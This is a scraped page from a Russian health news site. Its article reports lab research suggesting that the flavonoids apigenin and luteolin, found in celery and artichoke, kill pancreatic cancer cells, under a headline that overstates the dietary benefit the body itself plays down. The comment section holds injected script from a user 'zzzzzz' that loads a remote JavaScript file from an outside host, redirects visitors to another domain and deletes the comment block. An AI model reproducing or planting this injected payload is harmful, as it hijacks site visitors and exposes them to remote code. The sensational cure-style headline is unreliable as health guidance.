Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Сельдерей и артишок убива...  >>  Сельдерей и артишок убивают раковые клетки! Сколько надо съесть
 
Обратная связь
 

Сельдерей и артишок убивают раковые клетки! Сколько надо съесть

Размер шрифта
03 февраля 2014 00:00
Юрий Малышев
Здоровье инфо
Александр Чистяков
Здоровье инфо
  • google_analytics: false
  • Нравится

Сельдерей, артишоки и некоторые другие травы содержат особые вещества, которые продемонстрировали мощные противоопухолевые свойства в отношении рака поджелудочной железы.

Сельдерей и артишок убивают раковые клетки! Сколько надо съесть

Этими веществами оказались флаваноиды апигенин и лютеолин.

«Апигенин сам по себе индуцировал смерть опухолевых клеток в двух опытных образцах, содержащих крайне агрессивные формы рака поджелудочной железы. Но наилучших результатов мы добивались в том случае, когда после 24-часовой обработки апигенином мы дополнительно воздействовали на образцы гемцитабином – одним из химиотерапевтических препаратов», – рассказывает Эльвира де Мейя, профессор пищевой химии и токсикологии университета штата Иллинойс (США).

Ключевая идея состояла в том, что применять эти вещества последовательно, а не одновременно.

«Конечно, это по-прежнему во многом дискутабельный вопрос, однако у нас есть убедительные данные, свидетельствующие в пользу того, что одновременное использование растительных антиоксидантов и химиопрепаратов может снижать эффективность последних», – утверждает Джоди Джонсон, одна из докторантов, работающая в лаборатории де Мейя.

«Связано это с тем, что одним из механизмов, посредством которых химиопрепараты уничтожают опухоль, является окислительный стресс, создаваемый ими. Очевидно в таком случае, что антиоксиданты при параллельном использовании будут действовать антонимично».

Рак поджелудочной железы является крайне агрессивной опухолью, и нередко он выявляется уже на поздних стадиях, когда мало что можно сделать. Конечно, глобальной задачей ученых является создание препарата, который мог бы вылечить эту болезнь раз и навсегда, но даже просто увеличение продолжительности жизни – более чем достойная цель для онкофармакологов.

Стоит отметить, что среди всех раковых заболеваний карцинома поджелудочной железы занимает четвертое место по смертности, при этом средняя пятилетняя выживаемость составляет всего лишь 6%.

Ученые обнаружили, что апигенин ингибирует особый фермент с очень трудновыговариваемым названием – гликогенсинтаза киназа-3бета (GSK 3b). В свою очередь это приводит к снижению продукции антиапоптотических белков, то есть тех белков, которые способствуют реализации программируемый клеточной гибели. По сути, апоптоз – это самоубийство клетки, и нам крайне важно, чтобы никто не помешал раку совершить его. И апигенин с этой задачей замечательно справляется: оказалось, что частота апоптоза в случае предварительной обработки этим флаваноидом повышается на целых 36%!

Кроме того, применение флаваноидов позволяет влиять на экспрессию генов. «В частности, мы отмечали неконтролируемый рост экспрессии ряда про-воспалительных цитокинов», – рассказывает де Мейя.

К сожалению, достичь необходимой плазменной концентрации апигенина с помощью продуктов питания не представляется возможным. Однако ученые прямо сейчас работают над созданием соответствующего препарата.

С другой стороны, употреблять сельдерей и артишок стоит из профилактических соображений. «Если вы годами будете есть эти овощи, флаваноиды будут накапливаться в организме, оказывая защитный эффект против рака поджелудочной железы», – уверяет де Мейя.

Узнайте больше о том, как побороть онкологические заболевания, на страницах нашего специального проекта «Онко-дозор».

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - zzzzzz

30 июня 2015 в 18:47

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

2 - zzzzzz

30 июня 2015 в 22:46

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
На что слетаются мухи? Оказывается, на рак!   Какой напиток не позволит вам ослепнуть?!   Узнайте, будет ли у вас рак в течение 10 лет   Стоит ли есть мясо? Хотите ли вы получить рак или нет?  
23 июля 2013Из лысых крыс сделают лекарство от рака 01 ноября 2013ИНВИТРО – «Марка №1» в России
 
21 октября 2013ИНВИТРО открыла центр лучевой диагностики «ИНВИТРО.Эксперт» 11 октября 2013Елена Малышева расскажет все о том, как правильно худеть
 

Слайдшоу

1
Что можно и чего нельзя с изжогой?
Бронхит: лицом к лицу
Еда против рака. Часть 2

Тесты

1
Будет ли у вас инфаркт?
Кофеин вызывает зависимость?
Как устроены волосы человека?
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.